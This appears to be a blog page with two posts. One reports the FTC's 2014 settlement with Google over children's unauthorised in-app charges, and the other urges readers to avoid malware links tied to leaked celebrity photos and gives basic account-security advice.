FTC Settles with Google for Kids’ In-App Purchases

On September 4, 2014, the Federal Trade Commission announced a proposed settlement with Google Inc. (“Google”) stemming from allegations that the company unfairly billed consumers for mobile app charges incurred by children. The FTC’s complaint alleges that since 2011, Google violated the FTC Act’s prohibition on unfair commercial practices by billing consumers for in-app charges made by children without the authorization of the account holder.

Google agreed to pay a minimum of $19 million to provide refunds to consumers. To the extent Google issues less than $19 million in refunds within the 12 months after the settlement becomes final, the balance will be remitted to the FTC for use in providing additional remedies to consumers or for return to the U.S. Treasury. Google also has agreed to modify its billing practices to ensure that it obtains express, informed consent from consumers prior to billing them for in-app charges.

This settlement is the FTC’s third case concerning unauthorized in-app charges by children. As we previously reported, in July, the FTC announced that it filed a complaint against Amazon.com, Inc. for failing to obtain the consent of parents or other account holders prior to billing them for in-app charges incurred by children. In January, the FTC announced a proposed settlement with Apple Inc. stemming from allegations that the company billed consumers for mobile app charges incurred by children without their parents’ consent. Apple agreed to pay a minimum of $32.5 million to provide refunds to consumers.

The agreement with Google is open for public comment until October 6, 2014.

Read more on the FTC’s Business Center and Consumer Information blogs.

Update: On December 5, 2014, the FTC approved the final settlement order with Google.

Red Letter Day for Onanists and Internet Fraudsters

Yesterday a number of explicit photographs of celebrities, including Jennifer Lawrence, were leaked on the Internet. I'll get to that in a moment. First, if you read no further, read this:

Don't go looking for these photographs, and don't click any links sent to you purporting to be them.

If you must look, we've hosted them all here. Seriously, we have been out a-searching since the news broke, in order to protect our users from the inevitable tide of malware links that have already begun to spring up. The major search engines work hard to keep malicious sites seeded with "current event" keywords from popping up, but this time will be harder, as the sites offering these images will often be similar to those offering the malware.

Now I am going to break from the norm. Most security blogs include the advice "don't take nude photos". I'm not going to ask you to quit. If that's your bag, keep at it — but bear in mind that your photo collection is now worth more. It's now worth more to an attacker who wants to populate their porn site, or to  blackmail you. It is also worth more to you, for the peace of mind of those images being kept private.

If we said the answer was "don't do it" every time doing something on the Internet resulted in a problem, we wouldn't have Internet banking. Or the Internet, come to think of it. So no, you absolutely should store your personal photos on the Internet. You just need to take further steps to ensure they are secure.

These steps include:

1. Make sure you know where your photos are. Many phones now automatically send your images to the NSA/GCHQ etc. under the guise of backup. This can be turned off. Weigh up your dismay at not having your photos any more, vs. the chance of them being stolen. Personally, I vote for backup, as anyone who pinches my pictures will find a heady combination of safari shots, and pictures of serial numbers for things I need to fix. Remember any other backup services (DropBox, Mozy, Backblaze, Crashplan et al) that you use here as well.

2. Secure the photos on-device. If your PC has no password, and your phone regularly sits around unlocked, there's no point hacking your backups. Seems obvious, but the proportion of people who take nude selfies is greater than those who use a lock screen. Apparently.

3. Use a password you use nowhere else. No, really. I mean it this time. I know you ignored me when I said "use a different password everywhere". Look, I forgive you, because I like you. But this one is pretty serious. Don't share the password with the one you use on a messageboard, or for grocery shopping.

4. Turn on "two step verification", "two factor authentication" or whatever anyone's calling it these days.

5. Secure the reset channel. Password resets are a good way to break an account. This could be email (password and 2 factor advice applies here), phone (PIN protect your voicemail!), or silly security questions that anyone with access to your Facebook can answer (make like Graham Cluley and tell them your first pet was called "9£!ttty7-").

A final word on this: watch for those malware links. They're already out there.